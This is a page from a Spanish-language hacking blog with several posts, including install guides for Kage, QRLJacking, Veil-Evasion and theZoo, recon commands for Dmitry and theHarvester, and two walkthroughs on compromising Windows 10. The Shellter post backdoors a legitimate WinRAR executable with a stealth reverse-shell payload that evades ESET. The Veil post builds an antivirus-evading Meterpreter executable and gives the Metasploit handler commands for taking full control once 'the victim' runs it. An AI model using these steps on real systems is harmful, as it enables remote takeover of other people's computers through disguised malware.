Hacking Ético, Seguridad Informática, RedTeam, Pentesting.

Mostrando entradas con la etiqueta auditorias. Mostrar todas las entradas
Mostrando entradas con la etiqueta auditorias. Mostrar todas las entradas

sábado, 3 de agosto de 2019

KAGE INTERFAZ GRÁFICA PARA METASPLOIT



KAGE INTERFAZ GRÁFICA PARA METASPLOIT 
Kage (ka-geh) es una herramienta inspirada en AhMyth diseñada para Metasploit RPC Server para interactuar con las sesiones de meterpreter y generar cargas útiles. 

COMO INSTALARLO 
 ejecutar lo siguiente:
apt-get install –y nodejs

apt-get install libgconf-2-4

apt-get install npm

Download source code
npm install


npm run dev
cuando se termine de instalar y configurar todo no saldrá esta pantalla,ot activamos la base de datos en el botón azul 
Luego se configurar todo para su uso 

genera el nombre usuario, la contraseña (es aleatoriamente)

y ya tendremos la interfaz para usar.



martes, 20 de marzo de 2018

QRLJacking - A New Social Engineering Attack Vector

QRLJacking - A New Social 

Engineering Attack Vector

¿Qué es QRLJacking?
QRLJacking o Quick Response Code Login Jacking es un simple vector de ataque de ingeniería social capaz de secuestro de sesión que afecta a todas las aplicaciones que dependen de la función "Iniciar sesión con código QR" como una forma segura de iniciar sesión en las cuentas.En pocas palabras, la víctima  escanea el código QR del atacante, lo que resulta en el secuestro de la sesión.


Instalación: 
clonar el repositorio: https://github.com/OWASP/QRLJacking.git entra a la carpeta QrlJacking-Framework instalar los requerimientos: pip install -r requirements.txt ejecutar: python QRLJacker.py

 
Aplicaciones y servicios web vulnerables

Hay muchas aplicaciones web y servicios conocidos que eran vulnerables a este ataque hasta la fecha  en que escribimos este documento. Estos son algunos ejemplos (que hemos informado) que incluyen, entre otros:
 
Aplicaciones de chat:
WhatsApp, WeChat, Line, Weibo, QQ Mensajería instantánea
Servicios de correo:
QQ Mail (Personal y Negocio Corporativo), Yandex Mail
eCommerce:
Alibaba, Aliexpress, Taobao, Tmall, 1688.com, Alimama, Taobao Viajes
Banca en línea:
AliPay, Yandex Money, TenPay
Servicios de pasaportes "Críticos":
Pasaporte Yandex (Yandex Mail, Yandex Money, Yandex Maps, Yandex Videos, etc.)
Software de administración móvil:
AirDroid
Otros servicios:
MyDigiPass, Zapper & Zapper WordPress Inicie sesión con el complemento de código QR, aplicación Trustly,
Yelophone, Alibaba Yunos
 


miércoles, 28 de diciembre de 2016

Hacking y manipulación de paquetes IPv4 con Python y Scapy

12/28/2016 05:28:00 p. m. Posted by Secpronet , , , , , , , 2 comments
" Libro Hacking y manipulación de paquetes IPv4 con Python y Scapy"

Es un libro multimedia con vídeos, ilustraciones, códigos fuente e imágenes interactivas, que hará que el lector aprenda de forma práctica y muy visual:
Scapy es una de las herramientas de manipulación de paquetes más importantes. Además cuenta con la añadida cualidad de poder usarse como librería en nuestro propio software, permitiéndonos diseñar programas basándonos en él.
Este libro consta un contenido teórico acotado, pero suficiente, para que el alumno puede entender todos los conceptos explicados: desde la base hasta los aspectos más avanzados.
Aprenderá a desenvolverse con soltura en la línea de comandos y el CLI de Scapy. La paralelización de tareas y los entresijos de los hilos de Python: limitaciones, características, cuándo usarlos y cuándo no es conveniente.
Practicará con autómatas de estados finitos: diseñándolos e implementándolos usando Scapy y su Automaton. Todo ello sin necesidad de aprender las compleja teoría matemática que lo envuelve.

ÍNDICE DEL LIBRO

·         Introducción a Scapy
o   ¿Qué es Scapy?
o   El modo interactivo
o   Funciones de ayuda
o   Construcción de un paquete básico

·         Uso avanzado de Scapy
o   ¿Qué es un layer?
o   Pila TCP/IP y layers de Scapy
o   Layers más usados
o   Párametros de los layers
o   Modos de envío
o   Análisis de respuestas
o   Lectura de ficheros PCAP
o   Reinyección en modo flood
o   Creación de un nuevo layer
o   Exportar información y creación de gráficas

·         Usando Scapy como librería
o   Funciones y llamadas
o   Envío de información
o   Scapy y multi-threading
o   Interceptación de paquetes y el sistema operativo
o   Logging remoto con Syslog y Scapy
o   Automaton: El autómata de estados finitos de Scapy

                            

sábado, 16 de julio de 2016

Como usad Dmitry (Recopilación de información)

DMitry
Recopilación de información



Para que sirve 

Dmitry tiene la capacidad de reunir la mayor cantidad de información posible acerca de un host. funcionalidad de base es capaz de reunir posibles subdominios, direcciones de correo electrónico, información del tiempo de actividad, escaneo de puertos TCP, las búsquedas de whois, y más.


Opciones de búsqueda

-i nos permite realizar una búsqueda whois de la dirección IP de un host.
-w realizará una búsqueda whois sobre el nombre de dominio.
-n nos dará información Netcraft
-s realiza una búsqueda de posibles subdominios
-e realizará una búsqueda de direcciones de correo electrónico posibles.


"Para ver los demás comandos debes de colocar en la cosola los siguinte "Dmitry" y te saldrán las de mas opciones "
Como usarlo

Para modelo de ejemplo se usara lo siguiente 

dmitry google.com -e -n -s -i -w 

 





Espero le haya sido útil.  

miércoles, 13 de julio de 2016

Como Usar TheHarvester

The Harvester






Para que sirve 

Esta herramienta está diseñada para ayudar a los probadores de penetración en las primeras etapas de la prueba de penetración con el fin de entender la huella de cliente en el Internet. También es útil para cualquier persona que quiere saber lo que un atacante puede ver sobre su organización.



Como se usa 

El uso de este script es muy sencillo tenemos que usar el siguiente comando.

theharvester -d microsoft.com -l 500 -b google 

donde
-d =  dominio a a buscar 
-l  =  el limite de resultados a mostrar
-b  = el buscador que deseamos 
para mas comandos colocamos  theharvester options 

Ejemplo

A modo de ejemplo usare gmail.com

theharvester -d gmail.com -l 500 -b google




Esperamos que te haya sido útil.

jueves, 31 de marzo de 2016

VULNERAR WINDOWS 10 CON SHELLTER

VULNERAR  WINDOWS 10 CON SHELLTER 



En esta ocasión te enseñare como vulnerar windows 10 con shellter y metasploit dos fantásticas y poderosas herramientas para pruebas de penetración.


Nota: Tenemos que tener un .exe dentro de la carpeta de shellter a modo de ejemplo tome winrar

Lo primero que tenemos que hacer es abrir SHELLTER  de la siguiente forma clik derecho en el .exe y luego abrir con wine.


Luego de ello escogemos las opción "A"


Nota: colocar bien el nombre del ejecutable el (.exe) así no generar ningún error.

Nos pedirá que coloquemos el nombre del ejecutable y lo aremos de la siguiente manera en mi caso use winrar, esperamos que termine el proceso.


 Nos quedara así 

luego escogemos la opción "Y" luego la opción "L" y escogemos el payload de la siguiente forma 
Y: habilitar el modo de sigilo (enable stealth mode )
L:  use a listed payload or custom


Luego colocamos nuestra IP y el PUERTO al cual se va a conectar el payload


Esparamos que termine el proceso quedara así 


luego corremos METASPLOIT y lo configuramos de la siguiente forma (colocamos la misma ip y el mismo puerto configurado en shellter )


Se escaneo el archivo con eset 9 y se ejecuto 


Obtendremos acceso al sistema 




sábado, 23 de enero de 2016

Instalar TheZoo en Kali Linux 2.0

THE ZOO



ACERCA DE

El propósito del Zoo es permitir el estudio de malware y permitir a las personas que están interesadas en el análisis de malware o incluso como parte de su trabajo para tener acceso a el mismo, analizar las formas en que operan y tal vez incluso permitir a las personas de avanzada y con experiencia para bloquear malwares específicos dentro de su propio entorno.

CUIDADO !!!

Recuerde que estos son programas maliciosos y peligroso Vienen cifrado y bloqueado por una razón!!!  NO ejecutarlos a menos que esté absolutamente seguro de lo que está haciendo! Son para ser utilizado sólo con fines educativos.

Se recomienda que se ejecuta en una máquina virtual que no tiene conexión a Internet (o una red virtual interna si es necesario) y sin adiciones de huéspedes o cualquier equivalente. Algunos de ellos son gusanos y tratarán de forma automática para extenderse.


COMO SE INSTALA
Descargamos los archivos acá les dejo el link 
luego lo descomprimimos 

unzip  theZoo-master.zip

Entramamos a la carpeta en mi caso la ruta sería 

cd /Descargas/theZoo-master
luego de esto damos permisos al archivo theZoo.py de la siguiente forma  

chmod 777 theZoo.py

y por ultimo lo ejecutamos y nos queda así.

./theZoo.py





Video 







lunes, 18 de enero de 2016

INSTALAR VEIL EVASION EN KALI LINUX 2.0

INSTALAR VEIL EVASION EN KALI LINUX 2.0 


Te enseñare de una forma raída y sencilla como instalar esta poderosa herramienta, comencemos 


actualizamos los repositorios con este comando 

 apt-get update

luego procedemos a instalar veil con el siguiente comando 

apt-get install veil

si de esta forma no nos deja instalarlo lo clonamos de la siguiente forma 

git clone https://github.com/Veil-Framework/Veil-Evasion

luego de esto procedemos a ejecutar el setup.sh de la siguiente forma en mi caso la ruta es la siguiente
.
cd /root/Veil-Evasion/setup/setup.sh

pedirá que instalemos python, pywin, pycrypto lo cual aremos lo típico siguiente siguiente e instalar. 

Esperaremos a que termine de instalar y aremos los siguiente. ejecutamos veil de la siguiente forma, tenemos que estar en el directorio o la carpeta de veil. 

./veil-evasion.py

y por ultimo tendremos esto:



espero que te sea útil este post.






viernes, 15 de enero de 2016

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT KALI LINUX 2.0

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT


En la actualidad los sistemas operativos se han actualizado y han tendido demasiado auge entre los usuarios, Windows ha actualizado su sistema operativo y con ello los millones de usuarios que ya lo están usando, ha tenido pros y contras.

Sabiendo que no todos los sistemas son seguros, Windows no es la excepción, bueno como lo dice el título acá te enseñare cómo hacerlo paso a paso, así que comencemos.

Lo primero que tenemos que haces es irnos a la terminal y colocar lo siguiente tenemos que tener instalado Veil-Evasion buscamos la ruta donde lo tenemos instaldo en mi caso seria cd /usr/share/veil-evasion luego lo ejecutamos con este código  ./Veil-Evasion.py


nos llevara a esta pantalla 


luego con el comando use escogemos el payload a usar nos arrojara un listado de payloads disponibles en  este caso escogeré el 5 c/meterpreter/rev_tcp  


nos queda de esta forma 


configuramos nuestro LHOST Y LPORT seria de la siguiente forma  set LHOST  y tu ip y set LPORT y el puerto que quedara en escucha


luego con el comando generate  crearemos el payload nos pedirá que le coloquemos un nombre al payload en mi caso le colocare aplicación esperamos u momento y nos dará la ruta donde se encuentra  seria /var/lib/veil-evasion/output/compiled  y allí estará el .exe


quedara así 


luego ejecutamos metasploit configuraremos los siguiente
use multi/handler
usaremos este payload
set payload Windows/meterpreter/reverse_tcp
configuramos la ip y el Puerto de la siguiente forma
set Lhost y la ip que pusimos anteriormente
set Lport y el puerto que pusimos anteriormente
y de ultimo exploit
nos quedara todo de la siguiente forma


al momento que la victima ejecute el archivo, tendremos una sesión de meterpreter abierta 


obtendremos acceso total a la maquina





espero que te sea útil y te allá gustado. 



"EL MEJOR SISTEMA OPERATIVO EL CEREBRO "